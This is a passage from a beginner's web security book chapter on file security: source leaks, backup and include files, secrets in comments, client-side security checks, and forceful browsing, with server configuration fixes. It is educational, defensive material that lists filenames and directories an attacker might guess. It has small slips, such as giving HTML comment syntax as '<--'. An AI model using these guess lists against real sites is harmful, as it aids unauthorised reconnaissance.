Book Excerpt: Web Application Security, A Beginner's Guide [Updated 2019]
Web Application Security: A Beginner’s Guide provides IT professionals with an actionable, rock-solid foundation in Web application security--from a complete overview of the tools and resources essential to Web application security to the trade's best practices for detecting vulnerabilities and protecting applications. Designed specifically for the needs of IT professionals looking to boost their skills in the ever-changing world of computer security, the book is divided into three sections. The first presents a primer on web application and software security concepts in general. The chapter offered here, “File Security Principles” concludes the second section, which deals with principles of securing common areas of functionality of web applications. Finally, the third section shows the most effective ways to put all the concepts learned into action by laying out some secure development and deployment methodologies.
CHAPTER 8: File Security Principles
We'll Cover
• Keeping your source code secret
• Security through obscurity
• Forceful browsing
• Directory traversal
Even as widely used as relational SQL databases are, applications still store an enormous amount of data in plain old files, and this information can be just as critical or more so. Application configuration settings are stored in files. If an attacker could find a way to read these files—or even worse, write to them—then the whole security of the application could be put in jeopardy. We spent a lot of time and attention in the previous chapter talking about how important it is to secure your databases, and showing how to do this properly. But if you dig just a little deeper, you'll find that all the data in the database is stored in files. If you don't protect the files, you can't protect your database.
What other kinds of critical data are stored in files on your web servers? For one, the executable code for your web applications is, either in source code or in compiled binary form depending on the framework and language you're using. You definitely won't want attackers getting a hold of that. And for that matter, the actual executable files that make up your operating system are stored on the server. So without good file system security, all the other defenses that you'll implement are basically moot.
Keeping Your Source Code Secret
In the battle between web application developers and attackers, the attackers unfortunately have the upper hand in many ways. Developers have limited (and usually extremely tight) schedules; attackers have as much time as they want. Worse, developers have to make sure every possible avenue of attack has been closed off, while attackers only have to find one flaw to succeed. But web developers do have one great advantage over attackers: attackers don't have access to the application's source.
To users and attackers alike, a web application is an opaque black box. They can give input to the black box and get output in return, but they really don't have any way to see what's going on in the middle.
Note
An extremely important caveat to this statement is that any code that executes on the client tier of the web application, such as JavaScript or Flash content that runs in the user's browser, is completely visible to attackers. We'll cover this topic in more detail later in this chapter, but always remember that only server-side code can be secured from prying eyes.
Keeping potential attackers away from the application source and/or executable files is hugely helpful to defense. Consider what happens with box-product applications that get installed on the user's machine. As soon as they're released, attackers tear through them with binary static analysis tools, looking for flaws. There's nowhere to hide. Plus, the attackers can perform all of their poking and probing on their own local machine. They can completely disconnect from the Internet if they want. There's no way for the developers to know that their application is under attack.
Again, the situation is completely different for web applications, as illustrated in Figure 8-1. Any code running on the web server should be shielded from potential attackers. They can't break it down with static analyzers. And any attacking they do has to come through the network, where you'll have the chance to detect it and block it. But this great advantage that you have is dependent on your keeping the code secret. If it gets out into the hands of attackers, your advantage is lost: they'll be able to analyze it disconnected from the network, just as if it were a box-product application.
Figure 8-1 An attacker can statically analyze desktop applications, but web applications are like black boxes.
IMHO
Those of you who are enthusiastic open-source supporters may be bristling at some of the statements we've just made. We want to clarify that we're not knocking open-source code. We love open software, we use it all the time, and we've contributed some ourselves. But whether or not you release your code should be your choice to make. If you choose to make your app open, that's great, but don't let an attacker steal your code if you want to keep it to yourself.
However, there is one aspect to open-source software that we don't particularly like. We personally find the "given enough eyeballs, all bugs are shallow" mantra to be pretty weak, especially when it comes to security bugs. By relying on other people to find security issues in your code, you're making two very big assumptions: one, that they know what kinds of issues to look for; and two, that they'll report anything they find responsibly and not just exploit it for themselves.
Static Content and Dynamic Content
Before we go any further on the topic of source code security, it's important that we talk about the distinction between static content and dynamic content. When a user requests a resource from your web server, such as an HTML page or JPEG image, the server either sends him that resource as-is, or it processes the resource through another executable and then sends him the output from that operation. When the server just sends the file as-is, this is called static content, and when it processes the file, that's dynamic content. The web server decides whether a given resource is static or dynamic based on its file type, such as "HTML" or "JPG" or "ASPX."
For example, let's say my photographer friend Dave puts up a gallery of his photographs at www.photos.cxx/gallery.html. This page is simple, static HTML, and whenever you visit this page, the photos.cxx web server will just send you the complete contents of the gallery.html file:
[sourcecode]
<html>
<body>
<h1>Welcome to Dave's photo gallery</h1>
<img src="images/whistler_vacation.jpg" />
<img src="images/eagle_on_bike_trail.jpg" />
<img src="images/kitty_napping.jpg" />
...
</body>
[/sourcecode]
All the JPEG image files referenced on this page are also static content: When you view the gallery.html web page, your browser automatically sends requests for the images named in the <img> tags, and the web server simply sends the contents of those image files back to you.
Now let's contrast that with some dynamic content files. Let's say Dave adds a page to the photo gallery that randomly chooses and displays one picture from the archive. He writes this page in PHP and names it www.photos.cxx/random.php.
[sourcecode]
<html>
<body>
<h1>Random photo from Dave's photo gallery</h1>
<?php
$allImages = glob("images/*.jpg");
$randomImage = $allImages[array_rand($allImages, 1)];
echo “<img src="" . $randomImage . "" />";
?>
</body>
[/sourcecode]
Note
The PHP function "glob" referred to in this code snippet is one of the worst-named functions ever, and if you're not already a seasoned PHP developer, you probably won't have any idea what it really does. Although it sounds as if it should declare or set a global variable or something along those lines, glob is actually a file system function that searches for files and directories matching the specified pattern, and returns all of the matches in an array. For example, in the previous code snippet, we searched for the pattern "images/*.jpg," and glob returned a list of all JPEG filenames in the "images" directory. It's pretty simple, but just not intuitively named!
However, when Dave first installed the PHP interpreter on his web server, he configured the server to treat PHP files as dynamic content and not static content. Now when you make a request for www.photos.cxx/random.php, the server doesn't just send you back the raw source contents of the random.php file; instead, it sends the file to the PHP interpreter executable on the server, and then returns you the output of that executable, as illustrated in Figure 8-2.
Figure 8-2 The photos.cxx server is configured to process PHP pages as dynamic content.
Note
Just because a page is static content doesn't mean that there's nothing to do on that page. Static HTML files can have text box inputs, drop-down boxes, buttons, radio buttons, and all sorts of other controls. And on the other hand, just because a page is dynamic content doesn't mean that there is anything to do there. I could write a dynamic Perl script just to write out "Hello World" every time someone goes to that page.
The line between static and dynamic gets even blurrier when you look at pages that make extensive use of client-side script, like Ajax or Flash applications. We'll cover some of the many security implications of these applications later in this chapter, but for right now we'll focus on the fact that for static content, the source is delivered to the user's browser, but dynamic content is processed on the server first.
Revealing Source Code
You can see how important it is to configure the server correctly. If Dave had made a mistake when setting up the server, or if he accidentally changes the file-handling configuration at some time in the future, then when you request www.photos.cxx/random.php, you could end up getting the source code for the random.php file, as shown in Figure 8-3.
Figure 8-3 The photos.cxx server is misconfigured to serve PHP files as static content, revealing the application's source code.
In this particular case that may not be such a big deal. But what if he had put some more sensitive code into that page? What if he had programmed it so that on his wife's birthday, the page displays the message "Happy Birthday!" and always shows an image of a birthday cake instead of a random picture? If the source code for that leaked out, then his wife might found out ahead of time and the surprise would be ruined.
Of course, there are other much more serious concerns around source code leakage than just spoiled birthday surprises. Many organizations consider their source to be important intellectual property. Google tightly guards the algorithms that it uses to rank search results. If these were to leak out as the result of a misconfigured server, Google's revenue and stock price could decline.
It's bad enough if your source code leaks out and reveals your proprietary algorithms or other business secrets. But it's even worse if that source code contains information that could help attackers compromise other portions of your application.
One extremely bad habit that developers sometimes fall into is to hard-code application credentials into the application's source code. We saw in Chapter 7 that an application usually connects to its database using a database "application user" identity and not by impersonating the actual end users themselves. Out of convenience, application programmers will sometimes just write the database connection string—including the database application user's username and password—directly into the application source code. If your application is written this way and the page source code accidentally leaks out, now it's not just your business logic algorithms that will end up in the hands of attackers, but your database credentials too.
Another example of this same problem happens when developers write cryptographic secrets into their source code. Maybe you use a symmetric encryption algorithm (also called a secret-key algorithm) such as the Advanced Encryption Standard (AES) to encrypt sensitive information stored in users' cookies. Or maybe you use an asymmetric encryption algorithm (also called a public-key algorithm) such as RSA to sign cookie values so you know that no one, including potentially the user himself, has tampered with the values. In either of these cases, the cryptographic keys that you use to perform the encryption or signing must be kept secret. If they get out, all the security that you had hoped to add through the use of cryptography in the first place will be undone.
Interpreted versus Compiled Code
The photo gallery application we've been using as an example is written in PHP, which is an interpreted language. With interpreted-language web applications, you deploy the source code files directly to the web server. Then, as we saw before, when a user requests the file, the interpreter executable or handler module for that particular file format parses the page's source code directly to "run" that page and create a response for the user. Some popular interpreted languages for web applications include:
• PHP
• Perl
• Ruby
• ASP (that is, "classic" VBScript ASP, not ASP.NET)
However, not every language works this way; some languages are compiled and not interpreted. In this case, instead of directly deploying the source code files to the web server, you first compile them into executable libraries or archives, and then you deploy those libraries to the server. For example, let's say you wanted to write an ISAPI (Internet Server Application Programming Interface) extension handler for IIS using C++. You'd write your C++ code, compile the C++ to a Win32 dynamic-link library (DLL), and then copy that DLL to the web server.
Note
There is a third category of languages that combines elements of both interpreted and compiled languages. Languages like Java, Python, and the ASP.NET languages (C#, VB.NET, and so on) are compiled, but not directly into executable images. Instead, they're compiled into an intermediate, bytecode language. This bytecode is then itself either interpreted or recompiled into an actual executable.
This may seem like a roundabout method of writing applications, but it actually combines the best aspects of both compiled and interpreted languages: you get the performance of compiled code (or close to it) and the machine-independence of interpreted code.
Where this matters from a security perspective is that you shouldn't think you're any more secure against source code leakage just because you're using a compiled language instead of an interpreted one. If an attacker gains access to your Java WAR (Web ARchive) file or your ASP.NET assembly DLL, he may not be able just to open it in a text editor, but there are freely available decompiler tools that can actually turn these files back into source code. (You can see a screenshot of one of these tools, Java Decompiler, in Figure 8-4.) And as we saw at the beginning of the chapter, any type of executable can be scanned for vulnerabilities with static binary analysis tools.
Figure 8-4 The Java Decompiler tool reconstructs Java source code from a compiled JAR file.
Backup File Leaks
It's very important to remember that the way a web server handles a request for a file—that is, whether it treats the file as active content and processes it, or treats it as static content and simply sends it along—depends on the file's extension and not on its contents. Let's say that I took the random.php file from the example photo gallery application and renamed it to random.txt. If someone were to request the web page www.photos.cxx/random.txt now, the web server would happily send them the static source code of that file. Even though the contents of random.txt would still be the same completely legal and well-formed PHP code they always were, the server doesn't know or care about that. It doesn't open up the file to try to determine how to handle it. It just knows that it's configured to serve .txt files as static content, so that's what it does.
It's also important to remember that by default, most web servers will serve any unknown file type as static content. If Dave renames his random.php page to random .abcxyz and doesn't set up any kind of special handler rule on his server for ".abcxyz" files, then a request for www.photos.cxx/random.abcxyz would be fulfilled with the static contents of the file.
Note
As of this writing, two of the three most popular web servers—Apache (with a reported 60 percent market share) and nginx (with an 8 percent share)—serve file extensions as static content unless specifically configured not to. However, Microsoft Internet Information Services (or IIS, with a 19 percent share) version 6 and later will not serve any file with a filetype that it hasn't been explicitly configured to serve. IIS's behavior in this regard is much more secure than Apache's or nginx's, and the other web servers would do well to follow IIS's lead here.
Problems of this type, where dynamic-content files are renamed with static-content extensions, happen surprisingly more often than you'd think. The main culprit behind this is "ad-hoc source control"; or in other words, developers making backup files in a production directory. Here are three examples of how this might happen:
Scenario 1. The current version of random.php is programmed to find only random JPEG files in the image gallery. But Dave has noticed that there are some GIF and PNG files in there too, and right now those will never get chosen as one of the random photos. He wants to edit the code so that it looks for random GIF and PNG files too, but he's not 100 percent sure of the PHP syntax he needs to do that. So, the first thing he does is to make a copy of random.php called random.bak. This way, if he messes up the code trying to make the change, he'll still have a copy of the original handy and he can just put it back the way it was to begin with. Now he opens up random.php and edits it. He manages to get the syntax right on the first try, so he closes down his development environment and heads off to get some sleep. Everything looks great, except that he's forgotten about his backup file random.bak still sitting there on the web server.
Scenario 2. Just as in the first scenario, Dave wants to make a change to random.php, and he's not positive about the syntax to make the change correctly. He also knows how dangerous it is to edit files directly on the production server—if he did make a mistake, then everyone who tries to visit the site would just get an error until he fixes it. So he syncs his development machine to the current version of the production site, makes a random.bak backup copy of random.php on his local dev box, and then makes the changes to random.php there. He also has a few other features that he'd like to add to some of the other pages in the application, so he takes this opportunity to make those changes too. Once he's verified that all his changes work, he's ready to push the new files to production. So far, so good, except that when Dave goes to deploy his changes, instead of just copying and pasting the specific files that he edited, he copies and pastes the entire contents of his development folder, including the random.bak file.
Scenario 3. This time, Dave opens up the source code to make a simple change he's made dozens of times before. He knows exactly what syntax to use, and he knows he's not going to make any mistakes, so he doesn't save a backup file. If Dave doesn't save a backup file, there's no chance of accidental source code disclosure, right? Unfortunately, that's not the case. While Dave may not have explicitly saved a backup file, his integrated development environment (IDE) source code editor does make temporary files while the user is editing the originals. So the moment that Dave fired up the editor and opened random.php, the editor saved a local copy of random.php as random.php~. Normally the editor would delete this temporary file once Dave finishes editing the original and closes it, but if the editor program happens to crash or otherwise close unexpectedly, it may not get the chance to delete its temporary files and the source code would be visible. Even if that doesn't happen, if Dave is making changes on a live server, then the temporary file will be available for the entire time that Dave has the original open. If he leaves his editor open while he goes to lunch, or goes home for the night, that could be a pretty large window of attack.
In all of these cases, the backup files wouldn't be "advertised" to potential attackers. There wouldn't be any links to these pages that someone could follow. But these mistakes are common enough to make it worth an attacker's time to go looking for them. If an attacker sees that a web application has a page called random.php, he might make blind requests for files like:
• random.bak
• random.back
• random.backup
• random.old
• random.orig
• random.original
• random.php
• random.1
• random.2
• random.xxx
• random.php.bak
• random.php.old
And so on, and so on. The more obvious the extension, the sooner he's likely to guess it; so he'd find random.php.1 before he'd find random.xyzabc. But the solution here is not to pick obscure extensions: the solution is to not store backups in production web folders.
Include-File Leaks
While there's never a good reason to keep backup files on your live web server—at least, there's never a good enough reason to outweigh the danger involved—there's another situation that's a little more of a security gray area.
It's pretty common for multiple pages in a web application to share at least some of their functionality. For example, each page in Dave's photo gallery app might have a section where viewers can rate photos or leave comments on what they like and don't like. It would be a little silly for him to re-implement this functionality from scratch for each different file. Even cutting and pasting code from one file to the next means that every time he makes a change in one place, he'll need to remember to go make that exact same change in every other place. This is fragile and inefficient.
Instead of copying the same bit of code over and over in multiple places, it's better just to write it once into a single module. Every page that needs that particular functionality can then just reference that module. For compiled web applications, that module might be a library the application can link with, but for interpreted applications, it will just be another file full of source code. Now you have a new problem: what file extension should you give these included file modules?
In some programming languages, you don't have any real choice as to the file extension of your include modules. Python modules, for example, must be named with a .py file extension. But in others, such as PHP, you can choose any extension you want. Some developers like to name include modules with an extension like .inc or .include because it helps them keep straight which files are meant to be publicly accessible and which are meant to be include-only. The problem with this approach is that, unless configured otherwise, the web server will serve these files as static content to anyone who asks for them.
Into Action
The safest way to name your include files is to give them the same extension as normal pages: .php, .rb, and so on. But if you really want to name them with .inc extensions and you won't take this advice, then be absolutely sure to configure your web server to block requests for those extensions.
Keep Secrets Out of Static Files
So far, we've talked a lot about the importance of keeping the source code for your dynamic content pages out of the hands of potential attackers. There is an equally important flip side to this coin, however: You need to make sure that you never put sensitive information into static content pages.
The most common way you'll see this mistake is when developers write information into comments in HTML or script files. Since 99 percent of legitimate users (and QA testers) never view the page source, it can be easy to forget that comment text is only a "View Source" click away. It's unfortunately all too common to see HTML like this:
[sourcecode]
. . .
<form>
Username: <input type="text" id="username" /><br/>
Password: <input type="password" id="password" /><br/>
<!-- Note to dev team: use username=dev, pwd=c0nt4d0r -->
</form>
[/sourcecode]
Doing this is like hiding your front door key under the welcome mat: It's the first place an attacker will look. But realistically, it's doubtful that anyone does this knowingly; they either forget that HTML comments are visible in the page source, or they mix up client-side and server-side comments. Consider the following two snippets of mixed PHP/HTML code. Here's the first snippet:
[sourcecode]
. . .
Item name: <?php echo($catalog_item.name); ?> <br/>
Item price: <?php echo($catalog_item.fullPrice); ?> <br/>
<?php
// Note: change to $catalog_item.salePrice on 6/17
?>
[/sourcecode]
Now compare that with this snippet:
[sourcecode]
. . .
Item name: <?php echo($catalog_item.name); ?> <br/>
Item price: <?php echo($catalog_item.fullPrice); ?> <br/>
<!--
Note: change to $catalog_item.salePrice on 6/17
-->
[/sourcecode]
These two pieces of code are almost completely identical, and if you look at each of the resulting pages in browser windows, you wouldn't see any difference at all. But the first snippet used PHP comment syntax to document the upcoming sale price of the store item, and the second snippet used HTML comment syntax. The interpreter won't render PHP comments (or the comments of any other dynamic language like Java or C#) in the page output; it'll just skip over them. But the HTML comments do get written to the page output. That one little change from "//" to "<--" is all it took to reveal that a big sale is coming up and maybe convince some people to hold off on their purchases.
Besides HTML, you'll also see sensitive information in JavaScript comments. Even though you can make highly interactive sites with JavaScript—Google's Gmail, Docs, and Maps (shown in Figure 8-5) applications come to mind as great examples of JavaScript UI—it's still just a "static" language in that JavaScript files get served to the browser as source code. Any comments you write in JavaScript code will be visible to users.
Figure 8-5 Google Maps uses client-side JavaScript extensively in order to provide a responsive user interface.
Documentation
Another way you'll often see this kind of problem is in overly helpful documentation comments. (This usually comes up more often in JavaScript but sometimes in HTML too.) Most developers learn early on in their careers that it's important for them to properly document their code. It can be a nightmare trying to work on someone else's undocumented code, usually years after that person has left the organization, and you have no idea what they were thinking when they wrote it.
So documentation does have an important place in development, but that place is on the server, not the client. See how much information you can pull out of this seemingly innocent code comment:
[sourcecode]
<html>
<script>
// Changed by Kyle 7/1/2011: Fixed IE9 rendering bug
// Changed by Kate 6/28/2011: Fixed XHR timeout bug for IE, still TODO for FF
// Changed by John 6/27/2011: Improved perf by 23%, compare versus old version at dev02.site.cxx/page.php
// Created by Beth 1/4/2004
function foo( ) {
. . .
}
[/sourcecode]
There are a few readily apparent pieces of sensitive information being shared here. First, we can see that while there was a timeout bug in the code that was recently fixed for Internet Explorer, the bug is still present for Firefox. It's possible that there's a way an attacker could take advantage of that, maybe by intentionally creating a race condition.
Second, we can see that an old version of the page is stored at dev02.site.cxx/kyle/page.php. We may not have even been aware that there was such a domain as dev02.site.cxx before; here's a whole new site to explore and attack. And we know this site has old code, so there may be security vulnerabilities that are fixed on the main site that are still present on this dev site. And if there's a dev02.site.cxx, is there also a dev01.site.cxx, or a dev03.site.cxx?
There are a couple of other more subtle pieces of information an attacker can get from the comments that might lead him to take a closer look. First of all, the code is very old (by Internet standards, at least): it was originally written in January 2004. While it's not a hard rule, in general older code will often have more vulnerabilities than newer code. New vulnerabilities are developed all the time, and it's less likely that code dating back to 2004 would be as secure against a vulnerability published in 2008 as newer code would be.
Into Action
To ensure that you're not accidentally revealing sensitive information in HTML or script comments, check for these as part of your quality assurance acceptance testing. You should open each page and script file in a browser, view its source, and scan through the files looking for comment syntax such as "//" or "/*" or "<--". If you're using an automated testing framework, you can configure it to flag comment text for later review by a human tester to determine whether the comment should be considered sensitive and removed.
Use your judgment as to whether a particular comment is sensitive or not. Test credentials definitely are sensitive, and bug comments or "to-do's" usually shouldn't be publicly visible either. Remember that even simple documentation of the method—when it was written, who last modified it, what it's supposed to do—may unnecessarily reveal information to an attacker.
Note
Another factor to consider is that today's threats are a lot more severe than they were in 2004. Code of that era wasn't built to withstand concerted attacks from LulzSec-type organizations or from foreign government agencies with dedicated "Black-Ops" hacking teams.
Another subtle vulnerability predictor is that the code has been under a lot of churn in a short amount of time. Seven years went by without a single change, and then it was modified three times by three different people in the space of one week. Again, this doesn't necessarily mean the code has vulnerabilities in it, but it's something that might catch an attacker's eye and lead him to probe more deeply.
Exposing Sensitive Functionality
The final thing we need to discuss before we move on to other file security issues is the importance of keeping sensitive functionality away from attackers. We're drifting a little away from the overall chapter topic of file security now, but since we're already on the subject of keeping other sensitive information such as source code and comments safely tucked away on the server, this will be a good time to cover this important topic.
Many modern web applications do almost as much processing on the client-side tier as they do on the server-side. Some do even more. For example, think about online word processing applications like Google Docs, Microsoft Office Live, or Adobe Acrobat.com. All of the document layout, formatting, and commenting logic of these applications is performed on the client tier, in the browser, using JavaScript or Flash. These kinds of client-heavy web apps are called Rich Internet Applications, or RIAs for short.
RIAs can have a lot of advantages over standard server-heavy web applications. They can offer a more interactive, more attractive, and more responsive user interface. Imagine trying to write a full-featured word processor, spreadsheet, or e-mail app without client-side script. It might not be technically impossible, but the average user would probably spend about 30 seconds using such a slow and clunky application before giving up and going back to his old box-product office software. It's even worse when you're trying to use server-heavy apps on a mobile browser like a smartphone or tablet that has a slower connection speed when it's outside WiFi range.
Another advantage of RIAs is that you can move some of the business logic of the application to the client tier to reduce the burden on the server. Why spend server time calculating spreadsheet formulas when you can have the user's browser do it faster and cheaper? However, not all business logic is appropriate for the client to handle. Computing spreadsheet column sums and spell-checking e-mail messages with client-side script is one thing; making security decisions is totally different.
For a real-world example of inappropriate client-side logic, let's look at the MacWorld Expo web site circa 2007. The year 2007 was huge for MacWorld Expo; this was the show where Steve Jobs first unveiled the iPhone in his keynote address. If you had wanted to see this event in person, you would have had to pony up almost $1,700 for a VIP "platinum pass"—but at least one person found a way to sneak in completely for free.
The MacWorld conference organizers wanted to make sure that members of the press and other VIPs got into the show for free, without having to pay the $1,700 registration fee. So, MacWorld e-mailed these people special codes that they could use when they went to register for their conference passes on the MacWorld Expo web site. These codes gave the VIPs a special 100 percent discount—a free pass.
In an attempt to either speed up response time or take some load off their server, the conference web site designers implemented the discount feature with client-side code instead of server-side code. All of the logic to test whether the user had entered a valid discount code was visible right in the browser for anyone who cared to look for it. It was a simple matter for attackers—including at least one security researcher who then reported the issue to the press—to open the client-side JavaScript and reveal the secret discount codes.
The takeaway here is that you should never trust the client to make security decisions for itself. If the MacWorld Expo web site designers had kept the discount code validation logic on the server side, everything would have been fine. But by moving this logic to the client, they opened themselves to attack. Authentication and authorization functionality (which is essentially what a discount code validation is) should always be performed on the server. Remember, you can't control what happens on the client side. If you leave it up to the user to decide whether they should get a free pass to see Steve Jobs' keynote or whether they should pay $1,700, chances are they're going to choose the free option whether that's what you wanted or not.
IMHO
Programmers often refer to making function calls as "issuing commands" to the system. This is a Web 1.0 mindset. You may be able to think of server-side code as "commands," but when it comes to client-side code, you can only offer "suggestions." Never forget that an attacker can alter your client-side logic in any way he wants, which means that all the really important decisions need to be made on the server, where you have a better chance of guaranteeing that they're made the way you want them to be made.
Your Plan
❏ Don't hard-code login information such as test account credentials or database connection strings into your application. Doing this not only makes the code harder to maintain, but it also presents a potential security risk if the application source code were to be accidentally revealed.
❏ Never make backup copies of web pages in production folders, even for a second. Be sure not to deploy local backup copies to production, too: it's easy to forget this if your deployment procedure is just to copy all the files in your local development folder and paste them to the production machine.
❏ When possible, it's best to name any include files with the same extension as your main source files (for example, .php instead of .inc or .include).
❏ For dynamic content pages, write code comments using the comment syntax for the dynamic language and not in HTML. HTML comments will be sent to the client where attackers can read them.
❏ For static content pages, make sure that absolutely no sensitive information, including links to non-public files or directories, is written in the code comments. When possible, use your testing framework to flag all comments so that you or your quality assurance team can check them before you deploy.
❏ Always remember that code you write for the client tier is not a set of "commands," just a set of "suggestions." An attacker can change this code to anything he wants. If you make security decisions like authentication or authorization in client-side code, you may as well not make them at all.
Security Through Obscurity
With all of this text on how to keep an application's source code and algorithms hidden so that attackers can't view them, it may sound as if I'm advocating security through obscurity, or a defense based solely on the ability to hide the inner workings of the system. This is most definitely not the case; security through obscurity is a poor defense strategy that's doomed to failure.
That being said, I want you to build your applications securely, but there's no need to advertise potential vulnerabilities. To put it another way: security through obscurity is insufficient; but security and obscurity can be a good thing. If you look closely at all of the security principles and defense strategies we've discussed (and will discuss) in this chapter, you'll see that they are about improving both aspects.
Security expert Jay Beale, currently Managing Partner, CFO, and Chairman of InGuardians Inc, explores this same topic (and comes to the same conclusion) in his paper "'Security Through Obscurity' Ain't What They Think It Is." Jay states that obscurity isn't always bad, it's just bad when it's your only defense. He goes on to give an example: Suppose you have a web application serving sensitive internal company data. If your entire defense of this application consists of hiding it by running it on a nonstandard port (maybe port 8000 instead of 80), then you're going to get hacked. Someone will run a port scanner against this server, find the application, and steal all your confidential data. But assuming you do take proper steps to secure the site, locking it down with strong authentication and SSL, then running it on a nonstandard port certainly wouldn't hurt anything and might raise the bar a little bit.
Forceful Browsing
We're about halfway through the chapter now, so I think it's a good time for a quick "midterm" test.
The infamous web hacker Miss Black Cat is visiting Dave's photo gallery site, looking around for some interesting vulnerabilities she can exploit. She starts at the page www.photos.cxx/welcome.php. When she views the HTML source of the page—as all good attackers always do—she sees the following code:
[sourcecode]
<html>
<body>
<h1>Welcome to Dave's Photo Gallery!</h1>
<a href="photos.php">View photos</a>
<a href="vote.php">Vote for your favorite picture</a>
<a href="suggestion.php">Make an editing suggestion</a>
<a href="problem.php">Report a problem with this site</a>
</body>
[/sourcecode]
Question: Which page is Miss Black Cat most likely to visit next in her search for vulnerabilities?
a. photos.php
b. vote.php
c. suggestion.php
d. problem.php
Answer: None of the above! (Yes, I know this was an unfair trick question.) Miss Black Cat is a very savvy attacker, and she knows that her choices are never limited to just what the site developers meant for her. Instead of following one of these links to get to her next page, it's likely that she would try typing one of the following addresses into her browser just to see if any of them really exist:
• www.photos.cxx/admin.php
• www.photos.cxx/admin.html
• www.photos.cxx/private_photos.php
• www.photos.cxx/personal_photos.php
This is a very similar kind of attack to the file extension guessing attack we talked about in the previous section; in fact, both of these attacks are types of a larger category of web application attacks referred to as forceful browsing.
LINGO
Forceful browsing is a type of attack in which the attacker tries to gain information about the system by searching for unlinked pages or other resources. Sometimes these searches are simple, blind guesses for common names, and sometimes the attacker is tipped off to the existence of an unlinked file through a comment or reference in one of the other files in the application.
Subtypes of forceful browsing include filename and file extension guessing (as we've already seen), directory enumeration, insecure direct object referencing, and redirect workflow manipulation. You'll also hear forceful browsing sometimes referred to as "predictable resource location."
Forceful Browsing and Insecure Direct Object References
Forceful browsing attacks aren't always necessarily completely "blind," as in the examples we just showed where the attacker guessed for a page called admin.php. Sometimes an attacker might have a little better suspicion that an unreferenced file does exist on the server, just waiting to be uncovered.
If an attacker sees that a page has a reference to a resource like www.photos.cxx/images/00042.jpg or www.photos.cxx/stats/05152011.xlsx, then he's likely to try browsing for files with names close to those. The file "00042.jpg" looks as if it might be named based on an incrementing integer, so he might try "00041.jpg" or "00043.jpg." Likewise, "02142012.xlsx" looks as if it might be named based on a date (February 14, 2012). So, he might try forcefully browsing for other files with names like "02152011.xlsx." Filenames like these are dead giveaways that there are other similar files in the same folder.
This attack is essentially the same insecure direct object reference attack that we covered in Chapter 7, except in this case it's an attack against the file system and not an attack against a database index. The solution to the problem is also essentially the same: Ensure that you're applying proper access authorization on a resource-by-resource basis. If all of the files in a particular directory are meant to be publicly accessible even though they're not necessarily linked into the rest of the application, then you're fine as-is. If some of those files need to remain private, then move them into a separate directory and require appropriate authentication and authorization to get to them.
Directory Enumeration
If Cat's guesses at filenames turn up nothing, then she may move on to try some guesses at common directory names:
• www.photos.cxx/admin/
• www.photos.cxx/test/
• www.photos.cxx/logs/
• www.photos.cxx/includes/
• www.photos.cxx/scripts/
Also, the insecure direct object reference attack can be a very effective way to find hidden directories. If there's a "jan" folder and a "feb" folder, there are probably "mar" and "apr" folders too. And again, this is not necessarily a bad thing. In fact, some Model-View-Controller (MVC) application architectures intentionally work this way, so that a user can search for a particular range of data by manually changing a date string in a URL (for example, "201104" to "201105"). But whether to expose this data or not should be up to you, not to an attacker.
If any of the different common directory names or date/integer object reference manipulations that Cat tries comes back with anything besides an HTTP 404 "Not Found" error, she's in business. She'll be happy if she just gets redirected to a real page; for example, if her request for www.photos.cxx/test/ redirects her to the default page www.photos.cxx/test/default.php. This means that she's found an area of the web site she wasn't supposed to be in and whose only defense was probably the fact that nobody outside the organization was supposed to know that it existed. This page and this directory are unlikely to have strong authentication or authorization mechanisms, and probably won't have proper input validation on the controls either. Why would developers bother hardening code that only they use? (Or so they thought.…)
While this would be good for Cat, what she really wants is for the server to return a directory listing of the requested folder. You can see in Figure 8-6 what a directory listing would look like.
Figure 8-6 A directory listing of a guessed folder
It's basically the same thing you'd see if you opened a folder in your OS on your local machine: It shows all the files and subdirectories present in that folder. If an attacker gets this, he won't have to keep making random blind guesses; he'll know exactly what's there. Always configure your web server to disable directory listings.
Status Code Deltas
We said just a minute ago that our attacker Cat was looking for any HTTP status code result from her probing attacks besides 404 "Not Found." To be a little more accurate, it's not so much that she'd be looking for a certain status code, but more that she'd be looking for a change or delta between status codes.
Into Action
To properly defend against directory enumeration attacks, it's important to set up your web server to disable directory listings, as we mentioned earlier. But also make sure that the error code that's returned is always the same error code. Whether it's 404 or 401 or 403 doesn't really matter. You could even return 200 OK with a message like "Page Not Found" in the page text. Just make sure it's the same message whether the directory actually exists or not.
The exact methods used to configure a web server to correctly serve custom error pages like this vary from server to server. For Apache, you can set the ErrorDocument directive in the httpd.conf configuration file like this:
[sourcecode]
<Directory /web/docs>
ErrorDocument 400 /error.html
ErrorDocument 401 /error.html
...
[/sourcecode]
Instead of redirecting to an error page, you can also configure Apache to just serve some simple text:
[sourcecode]
<Directory /web/docs>
ErrorDocument 400 "An error occurred."
. . .
[/sourcecode]
You can also configure Microsoft IIS through the httpErrors section in any of its configuration files (web.config, machine.config, and applicationhost.config):
[sourcecode]
<httpErrors>
<error statusCode="400" path="error.html" />
<error statusCode="401" path="error.html" />
...
[/sourcecode]
For a more detailed look at various configuration options for these web servers, read the Apache documentation on custom error responses (httpd.apache.org/docs/2.2/custom-error.html) or the article "How to Use Detailed Errors in IIS 7.0" found on the IIS.net site (http://learn.iis.net/page.aspx/267/how-to-use-http-detailed-errors-in-iis-70/).
For example, let's say she looked for a completely random folder that would be almost 100 percent guaranteed not to exist, something like www.photos.cxx/q2o77xz4/. If the server returns an HTTP 403 "Forbidden" response code, that doesn't necessarily mean that the folder exists and that she's stumbled upon a secret hidden directory. It could just mean that the server has been configured to always return 403 Forbidden for nonexistent directories.
On the other hand, if a request for www.photos.cxx/q2o77xz4/ turns up a 404 Not Found response but a request for www.photos.cxx/admin/ comes back with 403 Forbidden or 401 Unauthorized, then that's a good sign that the /admin directory does actually exist. From Cat's perspective, this is nowhere near as useful as getting an actual directory listing, but it may help with some other attacks such as a directory traversal.
Redirect Workflow Manipulation
The final form of forceful browsing we'll be talking about is less commonly seen than the others, but still very dangerous when you do see it. Sometimes developers write web applications with an implicit workflow in mind. They might assume that users will first visit their welcome page, then view some catalog item pages, maybe put some items in a shopping cart, and then check out and pay. Of course, without explicit checks in place, users can visit pages in any order they want. Here's an example of what might go wrong for an application developer when an attacker decides to manipulate an implicit workflow.
